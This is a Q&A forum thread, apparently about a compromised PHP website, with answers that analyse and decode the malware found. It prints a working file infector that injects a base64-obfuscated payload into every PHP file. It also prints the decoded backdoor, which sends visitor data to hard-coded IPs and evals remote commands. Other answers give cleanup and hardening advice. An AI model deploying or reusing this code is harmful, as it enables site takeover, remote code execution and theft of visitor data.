$code = base64_encode($code);
$code = 'eval(base64_decode("'.$code.'")); ';
}
$code = base64_encode($code);
$z = GetMass('eval', $code1, $mas1);
$z. = GetMass('create_function', $code2, $mas2);
$z. = GetMass('base64_decode', $code3, $mas3);
$z. = $v0.'="'.$code.'";';
$z. = $coo;
return $z;
}
function modify($fname) {
$tmp = file_get_contents($fname);
$md_start = md5($tmp);
chmod($fname, 0666);
$md = md5($fname);
$pattern = '/function GetMama\(\).*\]\}\)\)\{break;\}\}/i';
$replacement = '';
$tmp = preg_replace($pattern, $replacement, $tmp);
$pattern = '/\/\*god_mode_on.*god_mode_off\*\//i';
$replacement = '';
$tmp = preg_replace($pattern, $replacement, $tmp);
$pattern = '/\/\*'.$md.'_on.*'.$md.'_off\*\//i';
$replacement = '';
$tmp = preg_replace($pattern, $replacement, $tmp);
$pattern = '/<\?php[\s]*\?>/i';
$replacement = '';
$tmp = preg_replace($pattern, $replacement, $tmp);
$pos = strpos($tmp, 'GetMama');
$pos2 = strpos($tmp, 'god_mode_on');
if (($pos === false) && ($pos2 === false)) {
$code_t = 'if (!function_exists("GetMama")){ function mod_con($buf){str_ireplace("<body>","<body>",$buf,$cnt_h);if ($cnt_h == 1) {$buf = str_ireplace("<body>","<body>" . stripslashes($_SERVER["good"]),$buf); return $buf;}str_ireplace("</body>","</body>",$buf,$cnt_h);if ($cnt_h == 1) {$buf = str_ireplace("</body>",stripslashes($_SERVER["good"])."</body>",$buf); return $buf;}return $buf;}function opanki($buf){$gz_e = false;$h_l = headers_list();if (in_array("Content-Encoding: gzip", $h_l)) { $gz_e = true;}if ($gz_e){$tmpfname = tempnam("/tmp", "FOO");file_put_contents($tmpfname, $buf);$zd = gzopen($tmpfname, "r");$contents = gzread($zd, 10000000);$contents = mod_con($contents);gzclose($zd);unlink($tmpfname);$contents = gzencode($contents);} else {$contents = mod_con($buf);}$len = strlen($contents);header("Content-Length: ".$len);return($contents);} function GetMama(){$mother = "###";return $mother;}ob_start("opanki");function ahfudflfzdhfhs($pa){$mama = GetMama();$file = urlencode(__FILE__);if (isset($_SERVER["HTTP_HOST"])){$host = $_SERVER["HTTP_HOST"];} else {$host = "";}if (isset($_SERVER["REMOTE_ADDR"])){$ip = $_SERVER["REMOTE_ADDR"];} else {$ip = "";}if (isset($_SERVER["HTTP_REFERER"])){$ref = urlencode($_SERVER["HTTP_REFERER"]);} else {$ref = "";}if (isset($_SERVER["HTTP_USER_AGENT"])){$ua = urlencode(strtolower($_SERVER["HTTP_USER_AGENT"]));} else {$ua = "";}if (isset($_SERVER["QUERY_STRING"])){$qs = urlencode($_SERVER["QUERY_STRING"]);} else {$qs = "";}$url_0 = "http://" . $pa;$url_1 = "/jedi.php?version=0991&mother=" .$mama . "&file=" . $file . "&host=" . $host . "&ip=" . $ip . "&ref=" . $ref . "&ua=" .$ua . "&qs=" . $qs;$try = true;if( function_exists("curl_init") ){$ch = curl_init($url_0 . $url_1);curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);curl_setopt($ch, CURLOPT_TIMEOUT, 3);$ult = trim(curl_exec($ch));$try = false;} if ((ini_get("allow_url_fopen")) && $try) {$ult = trim(@file_get_contents($url_0 . $url_1));$try = false;}if($try){$fp = fsockopen($pa, 80, $errno, $errstr, 30);if ($fp) {$out = "GET $url_1 HTTP/1.0\r\n";$out .= "Host: $pa\r\n";$out .= "Connection: Close\r\n\r\n";fwrite($fp, $out);$ret = "";while (!feof($fp)) {$ret .= fgets($fp, 128);}fclose($fp);$ult = trim(substr($ret, strpos($ret, "\r\n\r\n") + 4));}} if (strpos($ult,"eval") !== false){$z = stripslashes(str_replace("eval","",$ult)); eval($z); exit();}if (strpos($ult,"ebna") !== false){$_SERVER["good"] = str_replace("ebna","",$ult);return true;}else {return false;}}$father2[] = "78.46.173.14";$father2[] = "176.9.218.191";$father2[] = "91.228.154.254";$father2[] = "77.81.241.253";$father2[] = "184.82.117.110";$father2[] = "46.4.202.93";$father2[] = "46.249.58.135";$father2[] = "176.9.241.150";$father2[] = "46.37.169.56";$father2[] = "46.30.41.99";$father2[] = "94.242.255.35";$father2[] = "178.162.129.223";$father2[] = "78.47.184.33";$father2[] = "31.184.234.96";shuffle($father2);foreach($father2 as $ur){if ( ahfudflfzdhfhs($ur) ) { break ;}}}';
$mama = 'wtf';
$mama = $_SERVER["HTTP_HOST"];
$code_t = str_replace('###', $mama, $code_t);
$code = '<'.'?php ';
$prob = rand(5, 500);
for ($i = 0; $i < 700 + $prob; $i++) {
$code = $code.' ';
}
$code_t = Codee($code_t);
$code = $code.'/*'.$md.'_on*/ '.$code_t.' /*'.$md.'_off*/'.' ?>'.$tmp;
$f = fopen($fname, "w");
fputs($f, $code);
fclose($f);
}
chmod($fname, 0644);
}
function dir_num($dir) {
global $fileslist;
static $deep = 0;
$odir = @opendir($dir);
while (($file = @readdir($odir)) !== FALSE) {
if ($file == '.' || $file == '..') {
continue;
} else {
echo '. ';
if (
get_file_extension($file) == 'php') {
modify($dir.DIRECTORY_SEPARATOR.$file);
}
}
if (is_dir($dir.DIRECTORY_SEPARATOR.$file)) {
$deep++;
dir_num($dir.DIRECTORY_SEPARATOR.$file);
$deep--;
}
}@closedir($odir);
}
Echo 'Wait please...<br>';
$dir = dirname(__FILE__);
dir_num($dir);
echo '<script>window.location.reload();</script>';
exit();
this part of the script tries to find other php
files in the current and subdirectories and infects them.
source to share
I would say remove all such fragments, change all your passwords, and if possible, disable your site until support returns to you. Of course it looks like it's bad, after some digging around the code and decoding I found this:
<?php
if (!function_exists("GetMama")){
function mod_con($buf){
str_ireplace("<body>","<body>",$buf,$cnt_h);if ($cnt_h == 1) {
$buf = str_ireplace("<body>","<body>" . stripslashes($_SERVER["good"]),$buf); return $buf;
}str_ireplace("</body>","</body>",$buf,$cnt_h);if ($cnt_h == 1) {
$buf = str_ireplace("</body>",stripslashes($_SERVER["good"])."</body>",$buf); return $buf;
}return $buf;
}function opanki($buf){
$gz_e = false;$h_l = headers_list();if (in_array("Content-Encoding: gzip", $h_l)) {
$gz_e = true;
}if ($gz_e){
$tmpfname = tempnam("/tmp", "FOO");file_put_contents($tmpfname, $buf);$zd = gzopen($tmpfname, "r");$contents = gzread($zd, 10000000);$contents = mod_con($contents);gzclose($zd);unlink($tmpfname);$contents = gzencode($contents);
} else {$contents = mod_con($buf);
}$len = strlen($contents);header("Content-Length: ".$len);return($contents);
} function GetMama(){
$mother = "www.99bits.com";return $mother;
}ob_start("opanki");function ahfudflfzdhfhs($pa){
$mama = GetMama();$file = urlencode(__FILE__);if (isset($_SERVER["HTTP_HOST"])){
$host = $_SERVER["HTTP_HOST"];
} else {$host = "";
}if (isset($_SERVER["REMOTE_ADDR"])){
$ip = $_SERVER["REMOTE_ADDR"];
} else {$ip = "";
}if (isset($_SERVER["HTTP_REFERER"])){
$ref = urlencode($_SERVER["HTTP_REFERER"]);
} else {$ref = "";
}if (isset($_SERVER["HTTP_USER_AGENT"])){
$ua = urlencode(strtolower($_SERVER["HTTP_USER_AGENT"]));
} else {$ua = "";
}if (isset($_SERVER["QUERY_STRING"])){
$qs = urlencode($_SERVER["QUERY_STRING"]);
} else {$qs = "";
}$url_0 = "http://" . $pa;$url_1 = "/jedi.php?version=0991&mother=" .$mama . "&file=" . $file . "&host=" . $host . "&ip=" . $ip . "&ref=" . $ref . "&ua=" .$ua . "&qs=" . $qs;$try = true;if( function_exists("curl_init") ){
$ch = curl_init($url_0 . $url_1);curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);curl_setopt($ch, CURLOPT_TIMEOUT, 3);$ult = trim(curl_exec($ch));$try = false;
} if ((ini_get("allow_url_fopen")) && $try) {
$ult = trim(@file_get_contents($url_0 . $url_1));$try = false;
}if($try){
$fp = fsockopen($pa, 80, $errno, $errstr, 30);if ($fp) {
$out = "GET $url_1 HTTP/1.0\r\n";$out .= "Host: $pa\r\n";$out .= "Connection: Close\r\n\r\n";fwrite($fp, $out);$ret = "";while (!feof($fp)) {
$ret .= fgets($fp, 128);
}fclose($fp);$ult = trim(substr($ret, strpos($ret, "\r\n\r\n") + 4));
}
} if (strpos($ult,"eval") !== false){
$z = stripslashes(str_replace("eval","",$ult)); eval($z); exit();
}if (strpos($ult,"ebna") !== false){
$_SERVER["good"] = str_replace("ebna","",$ult);return true;
}else {return false;
}
}$father2[] = "78.46.173.14";$father2[] = "176.9.218.191";$father2[] = "91.228.154.254";$father2[] = "77.81.241.253";$father2[] = "184.82.117.110";$father2[] = "46.4.202.93";$father2[] = "46.249.58.135";$father2[] = "176.9.241.150";$father2[] = "46.37.169.56";$father2[] = "46.30.41.99";$father2[] = "94.242.255.35";$father2[] = "178.162.129.223";$father2[] = "78.47.184.33";$father2[] = "31.184.234.96";shuffle($father2);foreach($father2 as $ur){
if ( ahfudflfzdhfhs($ur) ) {
break ;
}
}
}
source to share
Based on a security background, I'm pretty sure your webserver has been hacked. To begin with, it is usually a good idea to investigate the source to avoid repeating this error.
To start:
- Find the first files infected via timestamps.
- Log active startup scripts to determine what is causing this, or errors in your PHP logs, etc.
If you are using shared hosting you cannot do this, shared hosting users are generally more vulnerable to hacking, but if you are on a VPS or better you can contact your host in case of managed hosting for full format or required security ...
However, the fact is that deleting these fragments will not be used 99.99% of the time, this will not prevent an attacker in the future. Changing passwords helps, but again, it's not a solid solution.
If you have the resources, hire a security professional to conduct a quick audit. There are many that only require payment if they find weakness. If not, then reevaluate the potential weaknesses on your server. See this section for Linux servers (http://www.thegeekstuff.com/2011/03/apache-hardening). If you are using Windows please let me know, I will link you to several for Windows IIS.
Glad I could help!
source to share